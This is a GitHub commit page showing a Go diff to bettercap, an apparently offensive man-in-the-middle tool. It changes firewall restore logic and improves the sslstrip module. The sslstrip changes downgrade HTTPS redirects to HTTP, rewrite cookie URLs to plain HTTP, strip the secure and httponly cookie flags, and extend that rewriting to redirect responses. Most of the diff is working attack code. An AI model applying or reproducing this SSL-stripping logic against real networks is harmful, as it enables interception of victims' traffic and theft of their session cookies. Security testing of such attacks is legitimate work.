Merge pull request #1085 from SkyperTHC/master

sslstrip fix & don't restore iptables/ip_forward on exit when bettercap did not change them.
This commit is contained in:
Simone Margaritelli 2024-08-08 13:02:15 +02:00 committed by GitHub
commit 06623ddfb9
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
2 changed files with 31 additions and 12 deletions

View file

@ -16,6 +16,7 @@ import (
type LinuxFirewall struct { type LinuxFirewall struct {
iface *network.Endpoint iface *network.Endpoint
forwarding bool forwarding bool
restore bool
redirections map[string]*Redirection redirections map[string]*Redirection
} }
@ -28,6 +29,7 @@ func Make(iface *network.Endpoint) FirewallManager {
firewall := &LinuxFirewall{ firewall := &LinuxFirewall{
iface: iface, iface: iface,
forwarding: false, forwarding: false,
restore: false,
redirections: make(map[string]*Redirection), redirections: make(map[string]*Redirection),
} }
@ -72,6 +74,7 @@ func (f LinuxFirewall) EnableForwarding(enabled bool) error {
return f.enableFeature(IPV6ForwardingFile, enabled) return f.enableFeature(IPV6ForwardingFile, enabled)
} }
f.restore = true
return nil return nil
} }
@ -156,6 +159,9 @@ func (f *LinuxFirewall) EnableRedirection(r *Redirection, enabled bool) error {
} }
func (f LinuxFirewall) Restore() { func (f LinuxFirewall) Restore() {
if f.restore == false {
return
}
for _, r := range f.redirections { for _, r := range f.redirections {
if err := f.EnableRedirection(r, false); err != nil { if err := f.EnableRedirection(r, false); err != nil {
fmt.Printf("%s", err) fmt.Printf("%s", err)

View file

@ -159,11 +159,12 @@ func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redi
return return
} }
func (s *SSLStripper) fixCookies(res *http.Response) { func (s *SSLStripper) fixCookiesInHeader(res *http.Response) {
origHost := res.Request.URL.Hostname() origHost := res.Request.URL.Hostname()
strippedHost := s.hosts.Strip(origHost) strippedHost := s.hosts.Strip(origHost /* unstripped */)
if strippedHost != nil && strippedHost.Hostname != origHost && res.Header["Set-Cookie"] != nil { if strippedHost != nil && /*strippedHost.Hostname != origHost && */res.Header["Set-Cookie"] != nil {
// origHost is being tracked.
// get domains from hostnames // get domains from hostnames
if origParts, strippedParts := strings.Split(origHost, "."), strings.Split(strippedHost.Hostname, "."); len(origParts) > 1 && len(strippedParts) > 1 { if origParts, strippedParts := strings.Split(origHost, "."), strings.Split(strippedHost.Hostname, "."); len(origParts) > 1 && len(strippedParts) > 1 {
origDomain := origParts[len(origParts)-2] + "." + origParts[len(origParts)-1] origDomain := origParts[len(origParts)-2] + "." + origParts[len(origParts)-1]
@ -171,12 +172,13 @@ func (s *SSLStripper) fixCookies(res *http.Response) {
log.Info("[%s] Fixing cookies on %s", tui.Green("sslstrip"), tui.Bold(strippedHost.Hostname)) log.Info("[%s] Fixing cookies on %s", tui.Green("sslstrip"), tui.Bold(strippedHost.Hostname))
cookies := make([]string, len(res.Header["Set-Cookie"])) cookies := make([]string, len(res.Header["Set-Cookie"]))
// replace domain and strip "secure" flag for each cookie // replace domain= and strip "secure" flag for each cookie
for i, cookie := range res.Header["Set-Cookie"] { for i, cookie := range res.Header["Set-Cookie"] {
domainIndex := domainCookieParser.FindStringIndex(cookie) domainIndex := domainCookieParser.FindStringIndex(cookie)
if domainIndex != nil { if domainIndex != nil {
cookie = cookie[:domainIndex[0]] + strings.Replace(cookie[domainIndex[0]:domainIndex[1]], origDomain, strippedDomain, 1) + cookie[domainIndex[1]:] cookie = cookie[:domainIndex[0]] + strings.Replace(cookie[domainIndex[0]:domainIndex[1]], origDomain, strippedDomain, 1) + cookie[domainIndex[1]:]
} }
cookie = strings.Replace(cookie, "https://", "http://", -1)
cookies[i] = flagsCookieParser.ReplaceAllString(cookie, "") cookies[i] = flagsCookieParser.ReplaceAllString(cookie, "")
} }
res.Header["Set-Cookie"] = cookies res.Header["Set-Cookie"] = cookies
@ -222,18 +224,28 @@ func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
newURL := location.String() newURL := location.String()
// are we getting redirected from http to https? // are we getting redirected from http to https?
if orig.Scheme == "http" && location.Scheme == "https" { // orig.Scheme is set to "https" during Process->REQUEST above. Can not check it.
// if orig.Scheme == "http" && location.Scheme == "https" {
if location.Scheme == "https" {
log.Info("[%s] Got redirection from HTTP to HTTPS: %s -> %s", tui.Green("sslstrip"), tui.Yellow("http://"+origHost), tui.Bold("https://"+newHost)) log.Info("[%s] Got redirection from HTTP to HTTPS: %s -> %s", tui.Green("sslstrip"), tui.Yellow("http://"+origHost), tui.Bold("https://"+newHost))
// strip the URL down to an alternative HTTP version and save it to an ASCII Internationalized Domain Name // strip the URL down to an alternative HTTP version and save it to an ASCII Internationalized Domain Name
strippedURL := s.stripURL(newURL) strippedURL := s.stripURL(newURL)
parsed, _ := url.Parse(strippedURL) parsed, _ := url.Parse(strippedURL)
hostStripped := parsed.Hostname() if parsed.Port() == "443" || parsed.Port() == "" {
hostStripped, _ = idna.ToASCII(hostStripped) if parsed.Port() == "443" {
s.hosts.Track(newHost, hostStripped) // Check for badly formatted "Location: https://domain.com:443/"
// Prevent stripping to "Location: http://domain.com:443/"
// and instead strip to "Location: http://domain.com/"
strippedURL = strings.Replace(strippedURL, ":443", "", 1)
}
hostStripped := parsed.Hostname()
hostStripped, _ = idna.ToASCII(hostStripped)
s.hosts.Track(newHost, hostStripped)
res.Header.Set("Location", strippedURL) res.Header.Set("Location", strippedURL)
}
} }
} }
} }
@ -283,13 +295,14 @@ func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
res.Header.Set("Content-Length", strconv.Itoa(len(body))) res.Header.Set("Content-Length", strconv.Itoa(len(body)))
// fix cookies domain + strip "secure" + "httponly" flags
s.fixCookies(res)
// reset the response body to the original unread state // reset the response body to the original unread state
// but with just a string reader, this way further calls // but with just a string reader, this way further calls
// to ioutil.ReadAll(res.Body) will just return the content // to ioutil.ReadAll(res.Body) will just return the content
// we stripped without downloading anything again. // we stripped without downloading anything again.
res.Body = ioutil.NopCloser(strings.NewReader(body)) res.Body = ioutil.NopCloser(strings.NewReader(body))
} }
// fix cookies domain + strip "secure" + "httponly" flags
// 302/Location redirect might set cookies as well. Always try to fix Cookies
s.fixCookiesInHeader(res)
} }